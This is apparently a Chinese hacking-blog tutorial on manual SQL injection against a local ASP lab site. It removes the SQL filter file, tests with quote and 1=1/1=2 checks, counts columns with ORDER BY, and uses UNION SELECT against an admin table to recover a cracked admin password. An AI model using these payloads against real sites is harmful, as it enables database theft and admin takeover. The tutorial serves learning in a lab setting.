手把手注入门之手注过程

Hello 大家好，我是大老李

手把手学基础手注（三）

上篇文章我们讲到了 配置asp的漏洞环境  

那么现在我们来进行手注

手注的话 建议大家用 火狐游览器（文末90sec火狐游览器百度云下载链接）

判断有无注入点

‍‍‍‍‍‍‍‍‍

发现被拦截了  

这样 作为新手教学 我们需要去 改一下代码

C:\Documents and Settings\Administrator\桌面\asp\Inc\Check_Sql.asp‍‍‍‍‍‍‍‍‍

将其删除

再去打’  提示找不到图片 （报错）

And 1=1 返回正常

And 1=2 返回错误  

判断其 存在注入

http://192.168.1.245/ProductShow.asp?ID=500 order by 10

判断字段值

10 返回正常

20 返回正常

25 返回错误

23返回错误

21 依然返回错误

判断字段值为20

http://192.168.1.245/ProductShow.asp?ID=500 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

联合查询

http://192.168.1.245/ProductShow.asp?ID=500 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from admin

解密结果为 a-123456

一次手注 完结

经常搞站有损身心健康 ，不如来碗老李鸡汤

网易云音乐关注电台：吾爱鸡汤

下载链接：链接：http://pan.baidu.com/s/1bo65Maz 密码：3h8i

有任何不懂得，可在下方留言，老李随时为你解答

ps：文章为本人原创，辛苦写的，如果你觉得你技术好，可以不看。

你会喜欢

记一次艰难上传-Mssql sa注入中文路径乱码&解决！

burp结合sqlmap进行后台登录框post注入

sql注入介绍